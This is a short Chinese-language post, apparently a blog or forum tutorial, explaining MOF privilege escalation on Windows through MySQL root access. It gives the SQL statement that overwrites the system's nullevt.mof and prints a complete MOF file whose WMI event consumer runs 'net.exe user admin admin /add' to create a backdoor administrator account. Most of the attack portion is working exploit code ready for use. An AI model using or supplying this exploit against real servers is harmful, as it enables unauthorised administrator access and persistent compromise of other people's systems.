mof提权原理及其过程

yun

mof提权的原理:

mof是windows系统的一个文件（在c:/windows/system32/wbem/mof/nullevt.mof）叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后，然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行，这个mof当中有一段是vbs脚本，这个vbs大多数的是cmd的添加管理员用户的命令。

以下是mof提权的过程:

将mof上传至任意可读可写目录下，这里我传到D:\wamp\下命名为：cnblackhat.mof。也就是：D:\wamp\cnblackhat.mof

然后使用sql语句将系统当中默认的nullevt.mof给替换掉。进而让系统执行我们这个恶意的mof文件。

替换的sql语句：select load_file('D:\wamp\cnblackhat.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

mof文件代码如下所示：

1. #pragma namespace("\\\\.\\root\\subscription")
   
2. 
   
3. instance of __EventFilter as $EventFilter
   
4. {
   
5.     EventNamespace = "Root\\Cimv2";
   
6.     Name  = "filtP2";
   
7.     Query = "Select * From __InstanceModificationEvent "
   
8.             "Where TargetInstance Isa \"Win32_LocalTime\" "
   
9.             "And TargetInstance.Second = 5";
   
10.     QueryLanguage = "WQL";
    
11. };
    
12. 
    
13. instance of ActiveScriptEventConsumer as $Consumer
    
14. {
    
15.     Name = "consPCSV2";
    
16.     ScriptingEngine = "JScript";
    
17.     ScriptText =
    
18.     "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
    
19. };
    
20. 
    
21. instance of __FilterToConsumerBinding
    
22. {
    
23.     Consumer   = $Consumer;
    
24.     Filter = $EventFilter;
    
25. };

复制代码

可见其中是有一段添加用户的脚本。账号为admin 密码为admin